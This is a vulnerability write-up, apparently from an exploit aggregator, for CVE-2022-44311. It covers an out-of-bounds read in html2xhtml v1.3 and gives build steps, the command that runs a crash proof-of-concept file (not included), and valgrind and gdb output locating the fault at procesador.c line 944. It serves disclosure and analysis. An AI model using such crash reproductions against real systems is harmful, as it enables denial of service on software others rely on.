## https://sploitus.com/exploit?id=9D72D78B-4F47-5116-84D1-DCE6DD0DC873
# Description for CVE-2022-44311
html2xhtml v1.3 was discovered to contain an Out-Of-Bounds read in the function static void elm_close(tree_node_t *nodo) at procesador.c. This vulnerability allows attackers to access sensitive files or cause a Denial of Service (DoS) via a crafted html file.
# Reproduction
To reproduce the vulnerability, download a vulnerable version of html2xhtml (v1.3) and compile the project:
```
wget http://www.it.uc3m.es/jaf/html2xhtml/downloads/html2xhtml-1.3.tar.gz
tar -xzvf html2xhtml-1.3.tar.gz
cd html2xhtml-1.3
./configure
make
cd src
```
Once the project has been compiled, we can point html2xhtml towards our proof of concept file included in this repository (CVE-2022-44311_crash):
```
./html2xhtml -t frameset ./CVE-2022-44311_crash
```
The previous command will produce a crash and return an error message:
```
zsh: segmentation fault ./src/html2xhtml -t frameset ./CVE-2022-44311_crash
```
Attaching valgrind to the program can help us understand what is causing the crash:
```
โโ$ valgrind ./src/html2xhtml -t frameset ./CVE-2022-44311_crash
==267753== Memcheck, a memory error detector
==267753== Copyright (C) 2002-2022, and GNU GPL'd, by Julian Seward et al.
==267753== Using Valgrind-3.19.0 and LibVEX; rerun with -h for copyright info
==267753== Command: ./src/html2xhtml -t frameset ./CVE-2022-44311_crash
==267753==
==267753== Invalid read of size 4
==267753== at 0x11B18A: elm_close (procesador.c:944)
==267753== by 0x11B18A: err_html_struct (procesador.c:1889)
==267753== by 0x11BBB5: err_content_invalid (procesador.c:1291)
==267753== by 0x11BBB5: elm_close.part.0 (procesador.c:959)
==267753== by 0x11C4C0: elm_close (procesador.c:944)
==267753== by 0x11C4C0: saxEndDocument (procesador.c:233)
==267753== by 0x1144AE: main (html2xhtml.c:117)
==267753== Address 0x3ec404 is not stack'd, malloc'd or (recently) free'd
==267753==
```
Valgrind tells us that an out-of-bounds read of size 4 is taking place in procesador.c, line 944. Attaching gdb to our program and executing the malicious file can confirm the valgrind output:
```
$ gdb src/html2xhtml
pwndbg> r -t frameset ./CVE-2022-44311_crash
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ[ REGISTERS ]โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
RAX 0xb11ae
RBX 0x5555555dd344 โโ 0x3
RCX 0x5a
RDX 0x2
RDI 0x555555573d40 (elm_list) โโ 0x6c6d7468 /* 'html' */
RSI 0x555555573160 (elm_buffer) โโ 0xd9810100028b8101
R8 0x1
R9 0x5555555ee520 โโ 0x5555555ee
R10 0x0
R11 0x7ffff7df2800 (iconv_close) โโ cmp rdi, -1
R12 0x5555555dd2d6 โโ 0x0
R13 0x7ffffffedc70 โโ 0x600000001
R14 0x5555555dd2d6 โโ 0x0
R15 0x4
RBP 0x555555573d40 (elm_list) โโ 0x6c6d7468 /* 'html' */
RSP 0x7ffffffedc30 โโ 0x1
RIP 0x55555556718a (err_html_struct+474) โโ cmp dword ptr [rbp + rax*4 + 0xc], 4
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ[ DISASM ]โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โบ 0x55555556718a <err_html_struct+474> cmp dword ptr [rbp + rax*4 + 0xc], 4
0x55555556718f <err_html_struct+479> jne err_html_struct+489 <err_html_struct+489>
โ
0x555555567199 <err_html_struct+489> mov rbx, qword ptr [rbx + 8]
0x55555556719d <err_html_struct+493> test rbx, rbx
0x5555555671a0 <err_html_struct+496> jne err_html_struct+448 <err_html_struct+448>
โ
0x555555567170 <err_html_struct+448> cmp r12, rbx
0x555555567173 <err_html_struct+451> je err_html_struct+498 <err_html_struct+498>
โ
0x5555555671a2 <err_html_struct+498> xor edi, edi
0x5555555671a4 <err_html_struct+500> mov qword ptr [rip + 0x4d6d5], r12 <actual_element>
0x5555555671ab <err_html_struct+507> call new_tree_node <new_tree_node>
0x5555555671b0 <err_html_struct+512> mov dword ptr [rax + 0x18], 0x59
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ[ SOURCE (CODE) ]โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
In file: /dev/shm/html2xhtml-1.3/src/procesador.c
939 static void elm_close(tree_node_t *nodo)
940 {
941 DEBUG("elm_close()");
942 EPRINTF1("cerrando elemento %s\n",ELM_PTR(nodo).name);
943
โบ 944 if (ELM_PTR(nodo).contenttype[doctype]==CONTTYPE_CHILDREN) {
945 /* si es de tipo child se comprueba su contenido */
946 int content[16384];
947 int i, num;
948 tree_node_t *elm;
949
```
GDB confirmed that the program is attempting to read from an invalid memory address when executing the following lines of source code:
```
โบ 944 if (ELM_PTR(nodo).contenttype[doctype]==CONTTYPE_CHILDREN) {
945 /* si es de tipo child se comprueba su contenido */
946 int content[16384];
947 int i, num;
948 tree_node_t *elm;
```
# References
* https://vulners.com/cve/CVE-2022-44311
* https://cwe.mitre.org/data/definitions/125.html